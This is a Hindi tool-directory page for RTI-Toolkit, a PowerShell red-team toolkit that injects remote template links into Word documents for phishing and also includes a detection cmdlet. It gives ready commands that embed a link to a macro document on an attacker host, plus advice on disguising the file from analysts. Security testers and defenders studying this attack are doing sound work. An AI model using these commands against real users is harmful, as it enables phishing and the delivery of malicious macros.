Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RTI-Toolkit — PowerShell टूलकिट रिमोट टेम्पलेट इंजेक्शन हमलों और बचाव के लिए। फ़िशिंग के लिए Office Word दस्तावेज़ों में दुर्भावनापूर्ण लिंक इंजेक्ट करता है, जिसमें ब्लू टीमों के लिए पहचान मॉड्यूल शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/nickvourd/rti-toolkit
फ़िशिंग उपकरणफिशिंगपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnickvourd/rti-toolkit

RTI-Toolkit

PowerShell टूलकिट रिमोट टेम्पलेट इंजेक्शन हमलों और बचाव के लिए। फ़िशिंग के लिए Office Word दस्तावेज़ों में दुर्भावनापूर्ण लिंक इंजेक्ट करता है, जिसमें ब्लू टीमों के लिए पहचान मॉड्यूल शामिल हैं।

रिपॉजिटरी देखें
559204 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RTI-Toolkit

रिमोट टेम्पलेट इंजेक्शन टूलकिट

विवरण

RTI-Toolkit एक ओपन-सोर्स PowerShell टूलकिट है जो रिमोट टेम्पलेट इंजेक्शन हमले के लिए है। इस टूलकिट में PS-Templator.ps1 नामक एक PowerShell स्क्रिप्ट शामिल है जिसका उपयोग आक्रमणकारी और रक्षात्मक दोनों दृष्टिकोणों से किया जा सकता है।

निम्नलिखित तालिका PS-Templator.ps1 के मुख्य मॉड्यूल (cmdlets) प्रस्तुत करती है:

Cmdletविवरणपरिप्रेक्ष्य
Invoke-Templateडिफ़ॉल्ट Office Word टेम्पलेट्स में रिमोट टेम्पलेट लिंक लागू करता हैआक्रमणकारी
Invoke-Regularबिना टेम्पलेट के नियमित Office Word दस्तावेज़ों में रिमोट टेम्पलेट लिंक लागू करता हैआक्रमणकारी
Invoke-IdentifyOffice Word docx दस्तावेज़ों में टेम्पलेट के साथ/बिना रिमोट टेम्पलेट लिंक की पहचान करता हैरक्षात्मक

⚠️ PS-Templator.ps1 केवल DOCX फ़ाइलों का समर्थन करता है।

ℹ️ इस उपकरण का उल्लेख नेशनल इंस्टीट्यूट ऑफ स्टैंडर्ड्स एंड टेक्नोलॉजी (NIST) नेशनल वल्नरेबिलिटी डेटाबेस (NVD) में CVE-2025-65318 और CVE-2025-65319 में किया गया है।

संस्करण

1.0.0

लाइसेंस

यह उपकरण License: MIT के अंतर्गत लाइसेंस प्राप्त है।

आभार

मेरे दोस्तों @Papadope9 और Stavros Gkounis (a.k.a purpl3ph03n1x) को विशेष धन्यवाद, जिन्होंने उपकरण के बीटा परीक्षण चरण के दौरान अमूल्य सहायता प्रदान की।

यह उपकरण कुछ वर्ष पहले @S1ckB0y1337 के साथ एक iCAST रेड टीमिंग मूल्यांकन के दौरान प्रेरित हुआ था।

सुपरनोवा ❤️ के साथ @nickvourd द्वारा बनाया गया था।

विषय-सूची

  • RTI-Toolkit
    • विवरण
    • संस्करण
    • लाइसेंस
    • आभार
    • विषय-सूची
    • रिमोट टेम्पलेट इंजेक्शन (RTI)
    • स्थापना
    • Cmdlets
      • Invoke-Template
        • Invoke-Template उदाहरण
      • Invoke-Regular
        • Invoke-Regular उदाहरण
        • Invoke-Regular उदाहरण 2
      • Invoke-Identify
        • Invoke-Identify उदाहरण
        • Invoke-Identify उदाहरण 2
    • संदर्भ

रिमोट टेम्पलेट इंजेक्शन (RTI)

माइक्रोसॉफ्ट ऑफिस के संदर्भ में रिमोट टेम्पलेट इंजेक्शन (RTI) एक विशिष्ट प्रकार की सुरक्षा कमजोरी को संदर्भित करता है जिसका शोषण ऑफिस दस्तावेज़ों (जैसे, Word, Excel, PowerPoint) में दुर्भावनापूर्ण टेम्पलेट्स के माध्यम से किया जा सकता है।

उदाहरण के लिए, DOCX फ़ाइल में, सामग्री संग्रह के अंदर XML प्रारूप में संग्रहीत होती है, और इनमें से कुछ XML फ़ाइलें बाहरी संसाधनों या टेम्पलेट्स का संदर्भ दे सकती हैं। हमलावर वास्तव में दुर्भावनापूर्ण लिंक या सामग्री डालने के लिए इन XML फ़ाइलों में हेरफेर कर सकते हैं जो संभावित रूप से कमजोरियों का शोषण कर सकते हैं या उपयोगकर्ताओं को धोखा दे सकते हैं।

यह एक मैक्रो-आधारित हमला है।

स्थापना

PS-Templator.ps1 को मेमोरी में एक मॉड्यूल के रूप में लोड करने के लिए, निम्नलिखित कमांड चलाएँ:

Import-Module .\PS-Templator.ps1

ℹ️ PS-Templator.ps1 बिना किसी अतिरिक्त निर्भरता को स्थापित करने की आवश्यकता के काम करता है।

ℹ️ PS-Templator.ps1 PowerShell मॉड्यूल के रूप में काम करता है।

ℹ️ PS-Templator.ps1 का परीक्षण Office 2019 Professional plus के साथ Windows 10 मशीन पर किया गया।

Cmdlets

Invoke-Template

Invoke-Template एक cmdlet है जो डिफ़ॉल्ट Office Word टेम्पलेट्स में रिमोट टेम्पलेट लिंक लागू करता है।

Invoke-Template उदाहरण

मान लें कि आपके पास एक डिफ़ॉल्ट Word टेम्पलेट है, जैसे कि ये:

सभी Word टेम्पलेट्स

उदाहरण के लिए, 'Name.docx' के रूप में सहेजा गया:

डिफ़ॉल्ट Word टेम्पलेट दस्तावेज़

यदि आप Invoke-Template cmdlet का उपयोग करते हैं तो आप इस docx में एक दुर्भावनापूर्ण लिंक डाल सकते हैं:

⚠️ Invoke-Template चलाने से पहले, कृपया सुनिश्चित करें कि दस्तावेज़ को सहेजें और इसे बंद करें (इसकी प्रक्रिया समाप्त करें)।

Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx

परिणाम:

Invoke-Template-1

जैसा कि आप देख सकते हैं, Invoke-Template मॉड्यूल मूल दस्तावेज़ का एक बैकअप रखता है और दुर्भावनापूर्ण दस्तावेज़ का पूरा पथ प्रदान करता है।

डीबगिंग परिप्रेक्ष्य से, यदि आप दुर्भावनापूर्ण docx को zip संग्रह में बदलते हैं और /word/_rels/settings.xml.rels में जाते हैं, तो आप दुर्भावनापूर्ण लिंक देख सकते हैं:

Invoke-Template-Debug

Invoke-Regular

Invoke-Regular एक cmdlet है जो बिना टेम्पलेट के डिफ़ॉल्ट Office Word दस्तावेज़ों में रिमोट टेम्पलेट लिंक लागू करता है।

Invoke-Regular उदाहरण

मान लें कि आपके पास बिना टेम्पलेट के एक डिफ़ॉल्ट Word दस्तावेज़ है, जैसे:

रिक्त दस्तावेज़

उदाहरण के लिए, 'Doc1.docx' के रूप में सहेजा गया:

Word दस्तावेज़

यदि आप Invoke-Regular cmdlet का उपयोग करते हैं तो आप इस docx में एक दुर्भावनापूर्ण लिंक डाल सकते हैं:

⚠️ Invoke-Regular चलाने से पहले, कृपया सुनिश्चित करें कि दस्तावेज़ को सहेजें और इसे बंद करें (इसकी प्रक्रिया समाप्त करें)।

Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx

परिणाम:

Invoke-Regular-1

जैसा कि आप देख सकते हैं, Invoke-Regular मॉड्यूल मूल दस्तावेज़ का एक बैकअप रखता है और दुर्भावनापूर्ण दस्तावेज़ का पूरा पथ प्रदान करता है।

डीबगिंग परिप्रेक्ष्य से, यदि आप दुर्भावनापूर्ण docx को zip संग्रह में बदलते हैं और /word/_rels/settings.xml.rels में जाते हैं, तो आप दुर्भावनापूर्ण लिंक देख सकते हैं:

Invoke-Regular-Debug-1

Invoke-Regular उदाहरण 2

OPSEC परिप्रेक्ष्य से, आप Invoke-Regular मॉड्यूल के साथ -TemplateName का उपयोग कर सकते हैं। यदि कोई इसे विश्लेषण करने का प्रयास करता है तो यह आपके दुर्भावनापूर्ण दस्तावेज़ को अधिक वैध बनाएगा।

यहाँ एक उदाहरण है:

Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx

परिणाम:

Invoke-Regular-Example-2

डीबगिंग परिप्रेक्ष्य से, यदि आप दुर्भावनापूर्ण docx को zip संग्रह में बदलते हैं और /docProps/app.xml में जाते हैं, तो आप नकली टेम्पलेट नाम देख सकते हैं:

Invoke-Regular-Fake-Template-Name

Invoke-Identify

टूल डाउनलोड करें